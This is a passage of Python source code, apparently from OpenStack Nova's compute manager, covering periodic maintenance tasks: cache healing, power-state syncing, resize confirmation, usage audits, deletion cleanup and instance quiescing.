If anything errors don't fail, as it's possible the instance
has been deleted, etc.
"""
heal_interval = CONF.heal_instance_info_cache_interval
if not heal_interval:
return
instance_uuids = getattr(self, '_instance_uuids_to_heal', [])
instance = None
LOG.debug('Starting heal instance info cache')
if not instance_uuids:
# The list of instances to heal is empty so rebuild it
LOG.debug('Rebuilding the list of instances to heal')
db_instances = objects.InstanceList.get_by_host(
context, self.host, expected_attrs=[], use_slave=True)
for inst in db_instances:
# We don't want to refresh the cache for instances
# which are building or deleting so don't put them
# in the list. If they are building they will get
# added to the list next time we build it.
if (inst.vm_state == vm_states.BUILDING):
LOG.debug('Skipping network cache update for instance '
'because it is Building.', instance=inst)
continue
if (inst.task_state == task_states.DELETING):
LOG.debug('Skipping network cache update for instance '
'because it is being deleted.', instance=inst)
continue
if not instance:
# Save the first one we find so we don't
# have to get it again
instance = inst
else:
instance_uuids.append(inst['uuid'])
self._instance_uuids_to_heal = instance_uuids
else:
# Find the next valid instance on the list
while instance_uuids:
try:
inst = objects.Instance.get_by_uuid(
context, instance_uuids.pop(0),
expected_attrs=['system_metadata', 'info_cache'],
use_slave=True)
except exception.InstanceNotFound:
# Instance is gone. Try to grab another.
continue
# Check the instance hasn't been migrated
if inst.host != self.host:
LOG.debug('Skipping network cache update for instance '
'because it has been migrated to another '
'host.', instance=inst)
# Check the instance isn't being deleting
elif inst.task_state == task_states.DELETING:
LOG.debug('Skipping network cache update for instance '
'because it is being deleted.', instance=inst)
else:
instance = inst
break
if instance:
# We have an instance now to refresh
try:
# Call to network API to get instance info.. this will
# force an update to the instance's info_cache
self._get_instance_nw_info(context, instance)
LOG.debug('Updated the network info_cache for instance',
instance=instance)
except exception.InstanceNotFound:
# Instance is gone.
LOG.debug('Instance no longer exists. Unable to refresh',
instance=instance)
return
except Exception:
LOG.error(_LE('An error occurred while refreshing the network '
'cache.'), instance=instance, exc_info=True)
else:
LOG.debug("Didn't find any instances for network info cache "
"update.")
@periodic_task.periodic_task
def _poll_rebooting_instances(self, context):
if CONF.reboot_timeout > 0:
filters = {'task_state':
[task_states.REBOOTING,
task_states.REBOOT_STARTED,
task_states.REBOOT_PENDING],
'host': self.host}
rebooting = objects.InstanceList.get_by_filters(
context, filters, expected_attrs=[], use_slave=True)
to_poll = []
for instance in rebooting:
if timeutils.is_older_than(instance.updated_at,
CONF.reboot_timeout):
to_poll.append(instance)
self.driver.poll_rebooting_instances(CONF.reboot_timeout, to_poll)
@periodic_task.periodic_task
def _poll_rescued_instances(self, context):
if CONF.rescue_timeout > 0:
filters = {'vm_state': vm_states.RESCUED,
'host': self.host}
rescued_instances = objects.InstanceList.get_by_filters(
context, filters, expected_attrs=["system_metadata"],
use_slave=True)
to_unrescue = []
for instance in rescued_instances:
if timeutils.is_older_than(instance.launched_at,
CONF.rescue_timeout):
to_unrescue.append(instance)
for instance in to_unrescue:
self.compute_api.unrescue(context, instance)
@periodic_task.periodic_task
def _poll_unconfirmed_resizes(self, context):
if CONF.resize_confirm_window == 0:
return
migrations = objects.MigrationList.get_unconfirmed_by_dest_compute(
context, CONF.resize_confirm_window, self.host,
use_slave=True)
migrations_info = dict(migration_count=len(migrations),
confirm_window=CONF.resize_confirm_window)
if migrations_info["migration_count"] > 0:
LOG.info(_LI("Found %(migration_count)d unconfirmed migrations "
"older than %(confirm_window)d seconds"),
migrations_info)
def _set_migration_to_error(migration, reason, **kwargs):
LOG.warning(_LW("Setting migration %(migration_id)s to error: "
"%(reason)s"),
{'migration_id': migration['id'], 'reason': reason},
**kwargs)
migration.status = 'error'
with migration.obj_as_admin():
migration.save()
for migration in migrations:
instance_uuid = migration.instance_uuid
LOG.info(_LI("Automatically confirming migration "
"%(migration_id)s for instance %(instance_uuid)s"),
{'migration_id': migration.id,
'instance_uuid': instance_uuid})
expected_attrs = ['metadata', 'system_metadata']
try:
instance = objects.Instance.get_by_uuid(context,
instance_uuid, expected_attrs=expected_attrs,
use_slave=True)
except exception.InstanceNotFound:
reason = (_("Instance %s not found") %
instance_uuid)
_set_migration_to_error(migration, reason)
continue
if instance.vm_state == vm_states.ERROR:
reason = _("In ERROR state")
_set_migration_to_error(migration, reason,
instance=instance)
continue
# race condition: The instance in DELETING state should not be
# set the migration state to error, otherwise the instance in
# to be deleted which is in RESIZED state
# will not be able to confirm resize
if instance.task_state in [task_states.DELETING,
task_states.SOFT_DELETING]:
msg = ("Instance being deleted or soft deleted during resize "
"confirmation. Skipping.")
LOG.debug(msg, instance=instance)
continue
# race condition: This condition is hit when this method is
# called between the save of the migration record with a status of
# finished and the save of the instance object with a state of
# RESIZED. The migration record should not be set to error.
if instance.task_state == task_states.RESIZE_FINISH:
msg = ("Instance still resizing during resize "
"confirmation. Skipping.")
LOG.debug(msg, instance=instance)
continue
vm_state = instance.vm_state
task_state = instance.task_state
if vm_state != vm_states.RESIZED or task_state is not None:
reason = (_("In states %(vm_state)s/%(task_state)s, not "
"RESIZED/None") %
{'vm_state': vm_state,
'task_state': task_state})
_set_migration_to_error(migration, reason,
instance=instance)
continue
try:
self.compute_api.confirm_resize(context, instance,
migration=migration)
except Exception as e:
LOG.info(_LI("Error auto-confirming resize: %s. "
"Will retry later."),
e, instance=instance)
@periodic_task.periodic_task(spacing=CONF.shelved_poll_interval)
def _poll_shelved_instances(self, context):
if CONF.shelved_offload_time <= 0:
return
filters = {'vm_state': vm_states.SHELVED,
'host': self.host}
shelved_instances = objects.InstanceList.get_by_filters(
context, filters=filters, expected_attrs=['system_metadata'],
use_slave=True)
to_gc = []
for instance in shelved_instances:
sys_meta = instance.system_metadata
shelved_at = timeutils.parse_strtime(sys_meta['shelved_at'])
if timeutils.is_older_than(shelved_at, CONF.shelved_offload_time):
to_gc.append(instance)
for instance in to_gc:
try:
instance.task_state = task_states.SHELVING_OFFLOADING
instance.save()
self.shelve_offload_instance(context, instance,
clean_shutdown=False)
except Exception:
LOG.exception(_LE('Periodic task failed to offload instance.'),
instance=instance)
@periodic_task.periodic_task
def _instance_usage_audit(self, context):
if not CONF.instance_usage_audit:
return
if compute_utils.has_audit_been_run(context,
self.conductor_api,
self.host):
return
begin, end = utils.last_completed_audit_period()
instances = objects.InstanceList.get_active_by_window_joined(
context, begin, end, host=self.host,
expected_attrs=['system_metadata', 'info_cache', 'metadata'],
use_slave=True)
num_instances = len(instances)
errors = 0
successes = 0
LOG.info(_LI("Running instance usage audit for"
" host %(host)s from %(begin_time)s to "
"%(end_time)s. %(number_instances)s"
" instances."),
dict(host=self.host,
begin_time=begin,
end_time=end,
number_instances=num_instances))
start_time = time.time()
compute_utils.start_instance_usage_audit(context,
self.conductor_api,
begin, end,
self.host, num_instances)
for instance in instances:
try:
compute_utils.notify_usage_exists(
self.notifier, context, instance,
ignore_missing_network_data=False)
successes += 1
except Exception:
LOG.exception(_LE('Failed to generate usage '
'audit for instance '
'on host %s'), self.host,
instance=instance)
errors += 1
compute_utils.finish_instance_usage_audit(context,
self.conductor_api,
begin, end,
self.host, errors,
"Instance usage audit ran "
"for host %s, %s instances "
"in %s seconds." % (
self.host,
num_instances,
time.time() - start_time))
@periodic_task.periodic_task(spacing=CONF.bandwidth_poll_interval)
def _poll_bandwidth_usage(self, context):
if not self._bw_usage_supported:
return
prev_time, start_time = utils.last_completed_audit_period()
curr_time = time.time()
if (curr_time - self._last_bw_usage_poll >
CONF.bandwidth_poll_interval):
self._last_bw_usage_poll = curr_time
LOG.info(_LI("Updating bandwidth usage cache"))
cells_update_interval = CONF.cells.bandwidth_update_interval
if (cells_update_interval > 0 and
curr_time - self._last_bw_usage_cell_update >
cells_update_interval):
self._last_bw_usage_cell_update = curr_time
update_cells = True
else:
update_cells = False
instances = objects.InstanceList.get_by_host(context,
self.host,
use_slave=True)
try:
bw_counters = self.driver.get_all_bw_counters(instances)
except NotImplementedError:
# NOTE(mdragon): Not all hypervisors have bandwidth polling
# implemented yet. If they don't it doesn't break anything,
# they just don't get the info in the usage events.
# NOTE(PhilDay): Record that its not supported so we can
# skip fast on future calls rather than waste effort getting
# the list of instances.
LOG.warning(_LW("Bandwidth usage not supported by "
"hypervisor."))
self._bw_usage_supported = False
return
refreshed = timeutils.utcnow()
for bw_ctr in bw_counters:
# Allow switching of greenthreads between queries.
greenthread.sleep(0)
bw_in = 0
bw_out = 0
last_ctr_in = None
last_ctr_out = None
usage = objects.BandwidthUsage.get_by_instance_uuid_and_mac(
context, bw_ctr['uuid'], bw_ctr['mac_address'],
start_period=start_time, use_slave=True)
if usage:
bw_in = usage.bw_in
bw_out = usage.bw_out
last_ctr_in = usage.last_ctr_in
last_ctr_out = usage.last_ctr_out
else:
usage = (objects.BandwidthUsage.
get_by_instance_uuid_and_mac(
context, bw_ctr['uuid'], bw_ctr['mac_address'],
start_period=prev_time, use_slave=True))
if usage:
last_ctr_in = usage.last_ctr_in
last_ctr_out = usage.last_ctr_out
if last_ctr_in is not None:
if bw_ctr['bw_in'] < last_ctr_in:
# counter rollover
bw_in += bw_ctr['bw_in']
else:
bw_in += (bw_ctr['bw_in'] - last_ctr_in)
if last_ctr_out is not None:
if bw_ctr['bw_out'] < last_ctr_out:
# counter rollover
bw_out += bw_ctr['bw_out']
else:
bw_out += (bw_ctr['bw_out'] - last_ctr_out)
objects.BandwidthUsage(context=context).create(
bw_ctr['uuid'],
bw_ctr['mac_address'],
bw_in,
bw_out,
bw_ctr['bw_in'],
bw_ctr['bw_out'],
start_period=start_time,
last_refreshed=refreshed,
update_cells=update_cells)
def _get_host_volume_bdms(self, context, use_slave=False):
"""Return all block device mappings on a compute host."""
compute_host_bdms = []
instances = objects.InstanceList.get_by_host(context, self.host,
use_slave=use_slave)
for instance in instances:
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid, use_slave=use_slave)
instance_bdms = [bdm for bdm in bdms if bdm.is_volume]
compute_host_bdms.append(dict(instance=instance,
instance_bdms=instance_bdms))
return compute_host_bdms
def _update_volume_usage_cache(self, context, vol_usages):
"""Updates the volume usage cache table with a list of stats."""
for usage in vol_usages:
# Allow switching of greenthreads between queries.
greenthread.sleep(0)
self.conductor_api.vol_usage_update(context, usage['volume'],
usage['rd_req'],
usage['rd_bytes'],
usage['wr_req'],
usage['wr_bytes'],
usage['instance'])
@periodic_task.periodic_task(spacing=CONF.volume_usage_poll_interval)
def _poll_volume_usage(self, context, start_time=None):
if CONF.volume_usage_poll_interval == 0:
return
if not start_time:
start_time = utils.last_completed_audit_period()[1]
compute_host_bdms = self._get_host_volume_bdms(context,
use_slave=True)
if not compute_host_bdms:
return
LOG.debug("Updating volume usage cache")
try:
vol_usages = self.driver.get_all_volume_usage(context,
compute_host_bdms)
except NotImplementedError:
return
self._update_volume_usage_cache(context, vol_usages)
@periodic_task.periodic_task(spacing=CONF.sync_power_state_interval,
run_immediately=True)
def _sync_power_states(self, context):
"""Align power states between the database and the hypervisor.
To sync power state data we make a DB call to get the number of
virtual machines known by the hypervisor and if the number matches the
number of virtual machines known by the database, we proceed in a lazy
loop, one database record at a time, checking if the hypervisor has the
same power state as is in the database.
"""
db_instances = objects.InstanceList.get_by_host(context, self.host,
expected_attrs=[],
use_slave=True)
num_vm_instances = self.driver.get_num_instances()
num_db_instances = len(db_instances)
if num_vm_instances != num_db_instances:
LOG.warning(_LW("While synchronizing instance power states, found "
"%(num_db_instances)s instances in the database "
"and %(num_vm_instances)s instances on the "
"hypervisor."),
{'num_db_instances': num_db_instances,
'num_vm_instances': num_vm_instances})
def _sync(db_instance):
# NOTE(melwitt): This must be synchronized as we query state from
# two separate sources, the driver and the database.
# They are set (in stop_instance) and read, in sync.
@utils.synchronized(db_instance.uuid)
def query_driver_power_state_and_sync():
self._query_driver_power_state_and_sync(context, db_instance)
try:
query_driver_power_state_and_sync()
except Exception:
LOG.exception(_LE("Periodic sync_power_state task had an "
"error while processing an instance."),
instance=db_instance)
self._syncs_in_progress.pop(db_instance.uuid)
for db_instance in db_instances:
# process syncs asynchronously - don't want instance locking to
# block entire periodic task thread
uuid = db_instance.uuid
if uuid in self._syncs_in_progress:
LOG.debug('Sync already in progress for %s' % uuid)
else:
LOG.debug('Triggering sync for uuid %s' % uuid)
self._syncs_in_progress[uuid] = True
self._sync_power_pool.spawn_n(_sync, db_instance)
def _query_driver_power_state_and_sync(self, context, db_instance):
if db_instance.task_state is not None:
LOG.info(_LI("During sync_power_state the instance has a "
"pending task (%(task)s). Skip."),
{'task': db_instance.task_state}, instance=db_instance)
return
# No pending tasks. Now try to figure out the real vm_power_state.
try:
vm_instance = self.driver.get_info(db_instance)
vm_power_state = vm_instance.state
except exception.InstanceNotFound:
vm_power_state = power_state.NOSTATE
# Note(maoy): the above get_info call might take a long time,
# for example, because of a broken libvirt driver.
try:
self._sync_instance_power_state(context,
db_instance,
vm_power_state,
use_slave=True)
except exception.InstanceNotFound:
# NOTE(hanlind): If the instance gets deleted during sync,
# silently ignore.
pass
def _sync_instance_power_state(self, context, db_instance, vm_power_state,
use_slave=False):
"""Align instance power state between the database and hypervisor.
If the instance is not found on the hypervisor, but is in the database,
then a stop() API will be called on the instance.
"""
# We re-query the DB to get the latest instance info to minimize
# (not eliminate) race condition.
db_instance.refresh(use_slave=use_slave)
db_power_state = db_instance.power_state
vm_state = db_instance.vm_state
if self.host != db_instance.host:
# on the sending end of nova-compute _sync_power_state
# may have yielded to the greenthread performing a live
# migration; this in turn has changed the resident-host
# for the VM; However, the instance is still active, it
# is just in the process of migrating to another host.
# This implies that the compute source must relinquish
# control to the compute destination.
LOG.info(_LI("During the sync_power process the "
"instance has moved from "
"host %(src)s to host %(dst)s"),
{'src': db_instance.host,
'dst': self.host},
instance=db_instance)
return
elif db_instance.task_state is not None:
# on the receiving end of nova-compute, it could happen
# that the DB instance already report the new resident
# but the actual VM has not showed up on the hypervisor
# yet. In this case, let's allow the loop to continue
# and run the state sync in a later round
LOG.info(_LI("During sync_power_state the instance has a "
"pending task (%(task)s). Skip."),
{'task': db_instance.task_state},
instance=db_instance)
return
orig_db_power_state = db_power_state
if vm_power_state != db_power_state:
LOG.info(_LI('During _sync_instance_power_state the DB '
'power_state (%(db_power_state)s) does not match '
'the vm_power_state from the hypervisor '
'(%(vm_power_state)s). Updating power_state in the '
'DB to match the hypervisor.'),
{'db_power_state': db_power_state,
'vm_power_state': vm_power_state},
instance=db_instance)
# power_state is always updated from hypervisor to db
db_instance.power_state = vm_power_state
db_instance.save()
db_power_state = vm_power_state
# Note(maoy): Now resolve the discrepancy between vm_state and
# vm_power_state. We go through all possible vm_states.
if vm_state in (vm_states.BUILDING,
vm_states.RESCUED,
vm_states.RESIZED,
vm_states.SUSPENDED,
vm_states.ERROR):
# TODO(maoy): we ignore these vm_state for now.
pass
elif vm_state == vm_states.ACTIVE:
# The only rational power state should be RUNNING
if vm_power_state in (power_state.SHUTDOWN,
power_state.CRASHED):
LOG.warning(_LW("Instance shutdown by itself. Calling the "
"stop API. Current vm_state: %(vm_state)s, "
"current task_state: %(task_state)s, "
"original DB power_state: %(db_power_state)s, "
"current VM power_state: %(vm_power_state)s"),
{'vm_state': vm_state,
'task_state': db_instance.task_state,
'db_power_state': orig_db_power_state,
'vm_power_state': vm_power_state},
instance=db_instance)
try:
# Note(maoy): here we call the API instead of
# brutally updating the vm_state in the database
# to allow all the hooks and checks to be performed.
if db_instance.shutdown_terminate:
self.compute_api.delete(context, db_instance)
else:
self.compute_api.stop(context, db_instance)
except Exception:
# Note(maoy): there is no need to propagate the error
# because the same power_state will be retrieved next
# time and retried.
# For example, there might be another task scheduled.
LOG.exception(_LE("error during stop() in "
"sync_power_state."),
instance=db_instance)
elif vm_power_state == power_state.SUSPENDED:
LOG.warning(_LW("Instance is suspended unexpectedly. Calling "
"the stop API."), instance=db_instance)
try:
self.compute_api.stop(context, db_instance)
except Exception:
LOG.exception(_LE("error during stop() in "
"sync_power_state."),
instance=db_instance)
elif vm_power_state == power_state.PAUSED:
# Note(maoy): a VM may get into the paused state not only
# because the user request via API calls, but also
# due to (temporary) external instrumentations.
# Before the virt layer can reliably report the reason,
# we simply ignore the state discrepancy. In many cases,
# the VM state will go back to running after the external
# instrumentation is done. See bug 1097806 for details.
LOG.warning(_LW("Instance is paused unexpectedly. Ignore."),
instance=db_instance)
elif vm_power_state == power_state.NOSTATE:
# Occasionally, depending on the status of the hypervisor,
# which could be restarting for example, an instance may
# not be found. Therefore just log the condition.
LOG.warning(_LW("Instance is unexpectedly not found. Ignore."),
instance=db_instance)
elif vm_state == vm_states.STOPPED:
if vm_power_state not in (power_state.NOSTATE,
power_state.SHUTDOWN,
power_state.CRASHED):
LOG.warning(_LW("Instance is not stopped. Calling "
"the stop API. Current vm_state: %(vm_state)s,"
" current task_state: %(task_state)s, "
"original DB power_state: %(db_power_state)s, "
"current VM power_state: %(vm_power_state)s"),
{'vm_state': vm_state,
'task_state': db_instance.task_state,
'db_power_state': orig_db_power_state,
'vm_power_state': vm_power_state},
instance=db_instance)
try:
# NOTE(russellb) Force the stop, because normally the
# compute API would not allow an attempt to stop a stopped
# instance.
self.compute_api.force_stop(context, db_instance)
except Exception:
LOG.exception(_LE("error during stop() in "
"sync_power_state."),
instance=db_instance)
elif vm_state == vm_states.PAUSED:
if vm_power_state in (power_state.SHUTDOWN,
power_state.CRASHED):
LOG.warning(_LW("Paused instance shutdown by itself. Calling "
"the stop API."), instance=db_instance)
try:
self.compute_api.force_stop(context, db_instance)
except Exception:
LOG.exception(_LE("error during stop() in "
"sync_power_state."),
instance=db_instance)
elif vm_state in (vm_states.SOFT_DELETED,
vm_states.DELETED):
if vm_power_state not in (power_state.NOSTATE,
power_state.SHUTDOWN):
# Note(maoy): this should be taken care of periodically in
# _cleanup_running_deleted_instances().
LOG.warning(_LW("Instance is not (soft-)deleted."),
instance=db_instance)
@periodic_task.periodic_task
def _reclaim_queued_deletes(self, context):
"""Reclaim instances that are queued for deletion."""
interval = CONF.reclaim_instance_interval
if interval <= 0:
LOG.debug("CONF.reclaim_instance_interval <= 0, skipping...")
return
# TODO(comstud, jichenjc): Dummy quota object for now See bug 1296414.
# The only case that the quota might be inconsistent is
# the compute node died between set instance state to SOFT_DELETED
# and quota commit to DB. When compute node starts again
# it will have no idea the reservation is committed or not or even
# expired, since it's a rare case, so marked as todo.
quotas = objects.Quotas.from_reservations(context, None)
filters = {'vm_state': vm_states.SOFT_DELETED,
'task_state': None,
'host': self.host}
instances = objects.InstanceList.get_by_filters(
context, filters,
expected_attrs=objects.instance.INSTANCE_DEFAULT_FIELDS,
use_slave=True)
for instance in instances:
if self._deleted_old_enough(instance, interval):
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
LOG.info(_LI('Reclaiming deleted instance'), instance=instance)
try:
self._delete_instance(context, instance, bdms, quotas)
except Exception as e:
LOG.warning(_LW("Periodic reclaim failed to delete "
"instance: %s"),
e, instance=instance)
@periodic_task.periodic_task
def update_available_resource(self, context):
"""See driver.get_available_resource()
Periodic process that keeps that the compute host's understanding of
resource availability and usage in sync with the underlying hypervisor.
:param context: security context
"""
new_resource_tracker_dict = {}
nodenames = set(self.driver.get_available_nodes())
for nodename in nodenames:
rt = self._get_resource_tracker(nodename)
rt.update_available_resource(context)
new_resource_tracker_dict[nodename] = rt
# Delete orphan compute node not reported by driver but still in db
compute_nodes_in_db = self._get_compute_nodes_in_db(context,
use_slave=True)
for cn in compute_nodes_in_db:
if cn.hypervisor_hostname not in nodenames:
LOG.info(_LI("Deleting orphan compute node %s") % cn.id)
cn.destroy()
self._resource_tracker_dict = new_resource_tracker_dict
def _get_compute_nodes_in_db(self, context, use_slave=False):
try:
return objects.ComputeNodeList.get_all_by_host(context, self.host,
use_slave=use_slave)
except exception.NotFound:
LOG.error(_LE("No compute node record for host %s"), self.host)
return []
@periodic_task.periodic_task(
spacing=CONF.running_deleted_instance_poll_interval)
def _cleanup_running_deleted_instances(self, context):
"""Cleanup any instances which are erroneously still running after
having been deleted.
Valid actions to take are:
1. noop - do nothing
2. log - log which instances are erroneously running
3. reap - shutdown and cleanup any erroneously running instances
4. shutdown - power off *and disable* any erroneously running
instances
The use-case for this cleanup task is: for various reasons, it may be
possible for the database to show an instance as deleted but for that
instance to still be running on a host machine (see bug
https://bugs.launchpad.net/nova/+bug/911366).
This cleanup task is a cross-hypervisor utility for finding these
zombied instances and either logging the discrepancy (likely what you
should do in production), or automatically reaping the instances (more
appropriate for dev environments).
"""
action = CONF.running_deleted_instance_action
if action == "noop":
return
# NOTE(sirp): admin contexts don't ordinarily return deleted records
with utils.temporary_mutation(context, read_deleted="yes"):
for instance in self._running_deleted_instances(context):
if action == "log":
LOG.warning(_LW("Detected instance with name label "
"'%s' which is marked as "
"DELETED but still present on host."),
instance.name, instance=instance)
elif action == 'shutdown':
LOG.info(_LI("Powering off instance with name label "
"'%s' which is marked as "
"DELETED but still present on host."),
instance.name, instance=instance)
try:
try:
# disable starting the instance
self.driver.set_bootable(instance, False)
except NotImplementedError:
LOG.warning(_LW("set_bootable is not implemented "
"for the current driver"))
# and power it off
self.driver.power_off(instance)
except Exception:
msg = _LW("Failed to power off instance")
LOG.warn(msg, instance=instance, exc_info=True)
elif action == 'reap':
LOG.info(_LI("Destroying instance with name label "
"'%s' which is marked as "
"DELETED but still present on host."),
instance.name, instance=instance)
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid, use_slave=True)
self.instance_events.clear_events_for_instance(instance)
try:
self._shutdown_instance(context, instance, bdms,
notify=False)
self._cleanup_volumes(context, instance.uuid, bdms)
except Exception as e:
LOG.warning(_LW("Periodic cleanup failed to delete "
"instance: %s"),
e, instance=instance)
else:
raise Exception(_("Unrecognized value '%s'"
" for CONF.running_deleted_"
"instance_action") % action)
def _running_deleted_instances(self, context):
"""Returns a list of instances nova thinks is deleted,
but the hypervisor thinks is still running.
"""
timeout = CONF.running_deleted_instance_timeout
filters = {'deleted': True,
'soft_deleted': False,
'host': self.host}
instances = self._get_instances_on_driver(context, filters)
return [i for i in instances if self._deleted_old_enough(i, timeout)]
def _deleted_old_enough(self, instance, timeout):
deleted_at = instance['deleted_at']
if isinstance(instance, obj_base.NovaObject) and deleted_at:
deleted_at = deleted_at.replace(tzinfo=None)
return (not deleted_at or timeutils.is_older_than(deleted_at, timeout))
@contextlib.contextmanager
def _error_out_instance_on_exception(self, context, instance,
quotas=None,
instance_state=vm_states.ACTIVE):
instance_uuid = instance.uuid
try:
yield
except NotImplementedError as error:
with excutils.save_and_reraise_exception():
if quotas:
quotas.rollback()
LOG.info(_LI("Setting instance back to %(state)s after: "
"%(error)s"),
{'state': instance_state, 'error': error},
instance_uuid=instance_uuid)
self._instance_update(context, instance_uuid,
vm_state=instance_state,
task_state=None)
except exception.InstanceFaultRollback as error:
if quotas:
quotas.rollback()
LOG.info(_LI("Setting instance back to ACTIVE after: %s"),
error, instance_uuid=instance_uuid)
self._instance_update(context, instance_uuid,
vm_state=vm_states.ACTIVE,
task_state=None)
raise error.inner_exception
except Exception:
LOG.exception(_LE('Setting instance vm_state to ERROR'),
instance_uuid=instance_uuid)
with excutils.save_and_reraise_exception():
if quotas:
quotas.rollback()
self._set_instance_error_state(context, instance)
@aggregate_object_compat
@wrap_exception()
def add_aggregate_host(self, context, aggregate, host, slave_info):
"""Notify hypervisor of change (for hypervisor pools)."""
try:
self.driver.add_to_aggregate(context, aggregate, host,
slave_info=slave_info)
except NotImplementedError:
LOG.debug('Hypervisor driver does not support '
'add_aggregate_host')
except exception.AggregateError:
with excutils.save_and_reraise_exception():
self.driver.undo_aggregate_operation(
context,
aggregate.delete_host,
aggregate, host)
@aggregate_object_compat
@wrap_exception()
def remove_aggregate_host(self, context, host, slave_info, aggregate):
"""Removes a host from a physical hypervisor pool."""
try:
self.driver.remove_from_aggregate(context, aggregate, host,
slave_info=slave_info)
except NotImplementedError:
LOG.debug('Hypervisor driver does not support '
'remove_aggregate_host')
except (exception.AggregateError,
exception.InvalidAggregateAction) as e:
with excutils.save_and_reraise_exception():
self.driver.undo_aggregate_operation(
context,
aggregate.add_host,
aggregate, host,
isinstance(e, exception.AggregateError))
def _process_instance_event(self, instance, event):
_event = self.instance_events.pop_instance_event(instance, event)
if _event:
LOG.debug('Processing event %(event)s',
{'event': event.key}, instance=instance)
_event.send(event)
@wrap_exception()
def external_instance_event(self, context, instances, events):
# NOTE(danms): Some event types are handled by the manager, such
# as when we're asked to update the instance's info_cache. If it's
# not one of those, look for some thread(s) waiting for the event and
# unblock them if so.
for event in events:
instance = [inst for inst in instances
if inst.uuid == event.instance_uuid][0]
LOG.debug('Received event %(event)s',
{'event': event.key},
instance=instance)
if event.name == 'network-changed':
self.network_api.get_instance_nw_info(context, instance)
else:
self._process_instance_event(instance, event)
@periodic_task.periodic_task(spacing=CONF.image_cache_manager_interval,
external_process_ok=True)
def _run_image_cache_manager_pass(self, context):
"""Run a single pass of the image cache manager."""
if not self.driver.capabilities["has_imagecache"]:
return
# Determine what other nodes use this storage
storage_users.register_storage_use(CONF.instances_path, CONF.host)
nodes = storage_users.get_storage_users(CONF.instances_path)
# Filter all_instances to only include those nodes which share this
# storage path.
# TODO(mikal): this should be further refactored so that the cache
# cleanup code doesn't know what those instances are, just a remote
# count, and then this logic should be pushed up the stack.
filters = {'deleted': False,
'soft_deleted': True,
'host': nodes}
filtered_instances = objects.InstanceList.get_by_filters(context,
filters, expected_attrs=[], use_slave=True)
self.driver.manage_image_cache(context, filtered_instances)
@periodic_task.periodic_task(spacing=CONF.instance_delete_interval)
def _run_pending_deletes(self, context):
"""Retry any pending instance file deletes."""
LOG.debug('Cleaning up deleted instances')
filters = {'deleted': True,
'soft_deleted': False,
'host': CONF.host,
'cleaned': False}
attrs = ['info_cache', 'security_groups', 'system_metadata']
with utils.temporary_mutation(context, read_deleted='yes'):
instances = objects.InstanceList.get_by_filters(
context, filters, expected_attrs=attrs, use_slave=True)
LOG.debug('There are %d instances to clean', len(instances))
for instance in instances:
attempts = int(instance.system_metadata.get('clean_attempts', '0'))
LOG.debug('Instance has had %(attempts)s of %(max)s '
'cleanup attempts',
{'attempts': attempts,
'max': CONF.maximum_instance_delete_attempts},
instance=instance)
if attempts < CONF.maximum_instance_delete_attempts:
success = self.driver.delete_instance_files(instance)
instance.system_metadata['clean_attempts'] = str(attempts + 1)
if success:
instance.cleaned = True
with utils.temporary_mutation(context, read_deleted='yes'):
instance.save()
@periodic_task.periodic_task(spacing=CONF.instance_delete_interval)
def _cleanup_incomplete_migrations(self, context):
"""Delete instance files on failed resize/revert-resize operation
During resize/revert-resize operation, if that instance gets deleted
in-between then instance files might remain either on source or
destination compute node because of race condition.
"""
LOG.debug('Cleaning up deleted instances with incomplete migration ')
migration_filters = {'host': CONF.host,
'status': 'error'}
migrations = objects.MigrationList.get_by_filters(context,
migration_filters)
if not migrations:
return
inst_uuid_from_migrations = set([migration.instance_uuid for migration
in migrations])
inst_filters = {'deleted': True, 'soft_deleted': False,
'uuid': inst_uuid_from_migrations}
attrs = ['info_cache', 'security_groups', 'system_metadata']
with utils.temporary_mutation(context, read_deleted='yes'):
instances = objects.InstanceList.get_by_filters(
context, inst_filters, expected_attrs=attrs, use_slave=True)
for instance in instances:
if instance.host != CONF.host:
for migration in migrations:
if instance.uuid == migration.instance_uuid:
# Delete instance files if not cleanup properly either
# from the source or destination compute nodes when
# the instance is deleted during resizing.
self.driver.delete_instance_files(instance)
try:
migration.status = 'failed'
with migration.obj_as_admin():
migration.save()
except exception.MigrationNotFound:
LOG.warning(_LW("Migration %s is not found."),
migration.id, context=context,
instance=instance)
break
@messaging.expected_exceptions(exception.InstanceQuiesceNotSupported,
exception.NovaException,
NotImplementedError)
@wrap_exception()
def quiesce_instance(self, context, instance):
"""Quiesce an instance on this host."""
context = context.elevated()
image_ref = instance.image_ref
image_meta = compute_utils.get_image_metadata(
context, self.image_api, image_ref, instance)
self.driver.quiesce(context, instance, image_meta)
def _wait_for_snapshots_completion(self, context, mapping):
for mapping_dict in mapping:
if mapping_dict.get('source_type') == 'snapshot':
def _wait_snapshot():
snapshot = self.volume_api.get_snapshot(
context, mapping_dict['snapshot_id'])
if snapshot.get('status') != 'creating':
raise loopingcall.LoopingCallDone()
timer = loopingcall.FixedIntervalLoopingCall(_wait_snapshot)
timer.start(interval=0.5).wait()
@messaging.expected_exceptions(exception.InstanceQuiesceNotSupported,
exception.NovaException,
NotImplementedError)
@wrap_exception()
def unquiesce_instance(self, context, instance, mapping=None):
"""Unquiesce an instance on this host.
If snapshots' image mapping is provided, it waits until snapshots are
completed before unqueiscing.
"""
context = context.elevated()
if mapping:
try:
self._wait_for_snapshots_completion(context, mapping)
except Exception as error:
LOG.exception(_LE("Exception while waiting completion of "
"volume snapshots: %s"),
error, instance=instance)
image_ref = instance.image_ref
image_meta = compute_utils.get_image_metadata(
context, self.image_api, image_ref, instance)
self.driver.unquiesce(context, instance, image_meta)
# TODO(danms): This goes away immediately in Lemming and is just
# present in Kilo so that we can receive v3.x and v4.0 messages
class _ComputeV4Proxy(object):
target = messaging.Target(version='4.0')
def __init__(self, manager):
self.manager = manager
def add_aggregate_host(self, ctxt, aggregate, host, slave_info=None):
return self.manager.add_aggregate_host(ctxt, aggregate, host,
slave_info=slave_info)
def add_fixed_ip_to_instance(self, ctxt, network_id, instance):
return self.manager.add_fixed_ip_to_instance(ctxt,
network_id,
instance)
def attach_interface(self, ctxt, instance, network_id, port_id,
requested_ip):
return self.manager.attach_interface(ctxt, instance, network_id,
port_id, requested_ip)
def attach_volume(self, ctxt, instance, bdm):
# NOTE(danms): In 3.x, attach_volume had mountpoint and volume_id
# parameters, which are gone from 4.x. Provide None for each to
# the 3.x manager above and remove in Lemming.
return self.manager.attach_volume(ctxt, None, None,
